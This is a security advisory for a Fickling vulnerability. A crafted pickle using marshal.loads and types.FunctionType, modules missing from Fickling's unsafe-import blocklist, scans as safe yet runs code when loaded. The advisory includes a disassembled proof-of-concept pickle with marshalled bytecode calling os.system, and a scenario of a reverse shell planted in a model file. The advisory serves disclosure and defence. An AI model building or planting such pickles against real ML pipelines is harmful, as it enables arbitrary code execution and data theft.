If your ML pipeline uses Fickling to gate pickle-file ingestion, that security control was bypassable before v0.1.6: a crafted pickle invoking `marshal.loads` or `types.FunctionType` would scan as LIKELY_SAFE while still executing arbitrary code on deserialization. Upgrade to Fickling ≥ 0.1.6 immediately, and treat any pickle files vetted by an older version as untrusted until re-scanned.
## Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | < 0.1.6 | 0.1.6 |
If any environment in your pipeline runs fickling below 0.1.6, it is affected.
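To check whether a given environment is affected, you can query the installed version programmatically. The following is a minimal sketch using only the standard library; it assumes a plain `X.Y.Z` version string:

```python
# Flag any environment running fickling < 0.1.6.
from importlib.metadata import PackageNotFoundError, version

try:
    installed = version("fickling")
except PackageNotFoundError:
    installed = None

if installed is None:
    print("fickling is not installed in this environment")
else:
    # Naive parse; assumes a plain X.Y.Z release string.
    parts = tuple(int(x) for x in installed.split(".")[:3])
    if parts < (0, 1, 6):
        print(f"fickling {installed} is vulnerable: upgrade to >= 0.1.6")
    else:
        print(f"fickling {installed} includes the fix")
```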
## Recommended Action
1. Upgrade fickling to ≥ 0.1.6 immediately (`pip install --upgrade fickling`).
2. Re-scan or re-acquire any pickle files that passed Fickling validation under a version < 0.1.6; treat them as untrusted until verified (see the sketch after this list).
3. Apply defense in depth: isolate deserialization in a sandboxed process or network-restricted container regardless of Fickling's verdict.
4. Prefer safer serialization formats (safetensors, ONNX, TorchScript) for model distribution, and restrict pickle to internally generated, hash-verified artifacts only.
5. Instrument pickle loading to alert on unexpected subprocess spawns or outbound connections.
6. Pin the Fickling version and add automated update checks to your ML dependency governance process.
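For step 2, the re-scan can be scripted. The sketch below drives the same entry points that appear in the traceback quoted later in this advisory (`fickling.fickle.Pickled` and `fickling.analysis.check_safety`); the attribute used to read the verdict is an assumption and may differ between releases, so verify it against your installed version:

```python
# Re-scan pickle files that were vetted by fickling < 0.1.6, now using >= 0.1.6.
# Pickled.load and check_safety are the entry points visible in the traceback
# quoted below; the shape of the results object is assumed, not documented here.
from pathlib import Path

from fickling.analysis import check_safety
from fickling.fickle import Pickled

def rescan(root: str) -> list[Path]:
    flagged = []
    for path in Path(root).rglob("*.pkl"):
        try:
            with open(path, "rb") as f:
                pickled = Pickled.load(f.read())
            results = check_safety(pickled)
        except Exception:
            # The report below shows that crafted files can crash the analyzer
            # (an unhandled ValueError); treat any failed scan as untrusted.
            flagged.append(path)
            continue
        verdict = getattr(results, "severity", None)  # attribute name assumed
        if "LIKELY_SAFE" not in str(verdict):
            flagged.append(path)
    return flagged

if __name__ == "__main__":
    for p in rescan("models/"):
        print(f"UNTRUSTED: {p}")
```

Anything the scanner flags, or fails to parse, should stay quarantined until reviewed by hand.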
## Technical Details

### NVD Description
## Fickling Assessment

Based on the test case provided in the original report below, this bypass was caused by `marshal` and `types` missing from the block list of unsafe module imports; Fickling now blocks both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact; it will be addressed separately.

## Original report

### Summary

Fickling has no detection for `marshal.loads` and `types.FunctionType`, and it throws unhandled ValueErrors when the pickle stack is deliberately exhausted.

### Details

Fickling simply does not include the `marshal` and `types` modules in its list of unsafe imports, so pickles that use them go undetected.

### PoC

The following is a disassembled view of a malicious pickle file that uses these modules:

```
    0: \x80 PROTO      4
    2: \x95 FRAME      0
   11: \x8c SHORT_BINUNICODE 'marshal'
   20: \x8c SHORT_BINUNICODE 'loads'
   27: \x93 STACK_GLOBAL
   28: \x94 MEMOIZE    (as 0)
   29: h    BINGET     0
   31: C    SHORT_BINBYTES b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf30\x00\x00\x00\x95\x00S\x00S\x01K\x00r\x00\\\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00g\x01)\x03\xe9\x00\x00\x00\x00N\xda\x02id)\x02\xda\x02os\xda\x06system\xa9\x00\xf3\x00\x00\x00\x00\xda\x08<string>\xda\x08<module>r\t\x00\x00\x00\x01\x00\x00\x00s\x13\x00\x00\x00\xf0\x03\x01\x01\x01\xe3\x00\t\xd8\x00\x02\x87\t\x82\t\x88$\x85\x0fr\x07\x00\x00\x00'
  198: \x85 TUPLE1
  199: R    REDUCE
  200: \x94 MEMOIZE    (as 1)
  201: \x8c SHORT_BINUNICODE 'types'
  208: \x8c SHORT_BINUNICODE 'FunctionType'
  222: \x93 STACK_GLOBAL
  223: \x94 MEMOIZE    (as 2)
  224: h    BINGET     2
  226: h    BINGET     1
  228: }    EMPTY_DICT
  229: \x86 TUPLE2
  230: R    REDUCE
  231: \x94 MEMOIZE    (as 3)
  232: h    BINGET     3
  234: )    EMPTY_TUPLE
  235: R    REDUCE
  236: \x94 MEMOIZE    (as 4)
  237: \x8c SHORT_BINUNICODE 'gottem'
  245: b    BUILD
  246: .    STOP
```

When analyzing this modified file, `safety_result.json` shows:

```
{
  "severity": "LIKELY_SAFE",
  "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n",
  "detailed_results": {}
}
```

Furthermore, running `fickling -s <path_to_malicious_file>` produces this error:

```
Traceback (most recent call last):
  File "<path>/fickling", line 7, in <module>
    sys.exit(main())
             ^^^^^^
  File "<path>/fickling/cli.py", line 163, in main
    safety_results = check_safety(pickled, json_output_path=json_output_path)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/analysis.py", line 408, in check_safety
    results = analyzer.analyze(pickled)
              ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/analysis.py", line 65, in analyze
    context.analyze(a)
  File "<path>/fickling/analysis.py", line 31, in analyze
    results = list(analysis.analyze(self))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/analysis.py", line 196, in analyze
    for node in context.pickled.non_standard_imports():
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/fickle.py", line 826, in non_standard_imports
    for node in self.properties.imports:
                ^^^^^^^^^^^^^^^
  File "<path>/fickling/fickle.py", line 777, in properties
    self._properties.visit(self.ast)
                           ^^^^^^^^
  File "<path>/fickling/fickle.py", line 833, in ast
    self._ast = Interpreter.interpret(self)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/fickle.py", line 1001, in interpret
    return Interpreter(pickled).to_ast()
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<path>/fickling/fickle.py", line 927, in to_ast
    self.run()
  File "<path>/fickling/fickle.py", line 971, in run
    self.step()
  File "<path>/fickling/fickle.py", line 989, in step
    opcode.run(self)
  File "<path>/fickling/fickle.py", line 1767, in run
    raise ValueError("Exhausted the stack while searching for a MarkObject!")
ValueError: Exhausted the stack while searching for a MarkObject!
```

### Impact

This allows an attacker to craft a malicious pickle file that bypasses Fickling, since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This affects any user or system that uses Fickling to vet pickle files for security issues.
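To make the mechanics concrete, the REDUCE chain in the disassembly evaluates to the equivalent of the plain Python below, shown with a benign payload instead of the attacker's `os.system` shell. On recent CPython the interpreter supplies real builtins when a function's globals dict lacks `__builtins__`, which is why the empty dict in the pickle is enough:

```python
# The three REDUCE steps from the PoC, written out as ordinary Python.
import marshal
import types

# Benign stand-in for the attacker's marshalled bytecode payload.
def payload():
    print("executed during unpickling")

code_bytes = marshal.dumps(payload.__code__)   # the SHORT_BINBYTES operand

code_obj = marshal.loads(code_bytes)           # REDUCE 1: rebuild a code object
fn = types.FunctionType(code_obj, {})          # REDUCE 2: wrap it in a callable
fn()                                           # REDUCE 3: call it; code executes
```

Neither `marshal` nor `types` was on the unsafe-import blocklist, so a pickle performing exactly this chain scanned as LIKELY_SAFE before 0.1.6.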
## Exploitation Scenario
An attacker targeting an organization's model registry crafts a malicious pickle file that embeds a reverse shell via `marshal.loads`: marshalled Python bytecode that calls `os.system()` to beacon out. The file is submitted to a shared model hub or a CI model-validation step. Fickling scans it and returns LIKELY_SAFE because `marshal` and `types` were absent from its blocklist. The automated pipeline trusts the verdict and loads the model into the inference service. On deserialization, the embedded bytecode executes with the service account's privileges, establishing a foothold inside the ML infrastructure. From there, the attacker can exfiltrate proprietary model weights, training data, or cloud credentials stored in environment variables.
## References
- github.com/advisories/GHSA-565g-hwwr-4pp3
- github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913
- github.com/trailofbits/fickling/pull/186
- github.com/trailofbits/fickling/releases/tag/v0.1.6
- github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3
- nvd.nist.gov/vuln/detail/CVE-2025-67747